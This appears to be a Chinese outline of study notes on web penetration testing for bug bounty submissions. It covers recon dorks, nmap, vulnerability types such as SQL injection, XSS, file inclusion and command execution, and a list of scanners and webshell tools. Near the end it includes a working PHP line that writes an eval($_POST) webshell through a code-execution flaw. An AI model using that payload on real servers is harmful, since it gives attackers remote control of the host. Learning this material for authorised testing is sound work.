一,信息侦探技术准备工作
站长之家
搜索引擎
stie:baidu.com
inurl:baidu.com
站内侦探
//discuz论坛 https://www.***.org/space-uid-1.html
//dz 邮件找出源ip
社工库,大数据筛选
nmap.bat
nmap www.***.com -p 80
御剑
Malte go
厂商寻找
http://butian.360.cn/company/openindex
系统 后台类- **系统,平台, 管理
企业 类 - **公司,**企业,**平台
漏洞提交(白帽提交漏洞须知)
提交条件
演示
提交技巧
加密解密
md5 base64 url编码
理论
webshell exp poc 提权 渗透 远程控制 服务器
root administrator(s)
基本漏洞类型
弱口令 ***.php?info=1234
爆破 遍历
sql注入 get post cookie
xss攻击 xss.hi-ourlife.com xss平台
代码执行 命令执行 net user
文件包含 .php?include=index.php
越权
逻辑
配置错误
敏感信息泄露 site:www.*.com intext:订单
二部分 漏洞
弱口令 爆破 遍历 .
java环境安装
java一键配置
brup工具
mysql手工注入语句大全
XSS
反射 -没有过滤
存储 -
DOM
csrf原理
OWASP-CSRFTester-1.0 半自动化工具伪造工具
文件包含
本地包含 ***.com/fileiniclude.php?file=file
远程包含 ***.com/fileiniclude.php?file=http-file
挖掘 e.g www.***.com/***.php?file=
远程包含
代码执行:
实例地址:
http://localhost/subject/code-exe.php?code=code
熟知可利用常见的php函数:
phpinfo()、echo等等调试函数
使用代码执行漏洞创建个webshell:
<?php
$file='mst.php';$person='<?php @eval($_POST[1]);?>';file_put_contents($file, $person, FILE_APPEND | LOCK_EX);
越权
文件上传-brup工具修改数据上传
三-工具
safe3wvs工具
AWVS工具
Nmap工具
中国菜刀
椰树、御剑(6款扫描工具
bugscan
BruteXSS python2.7环境
GourdScan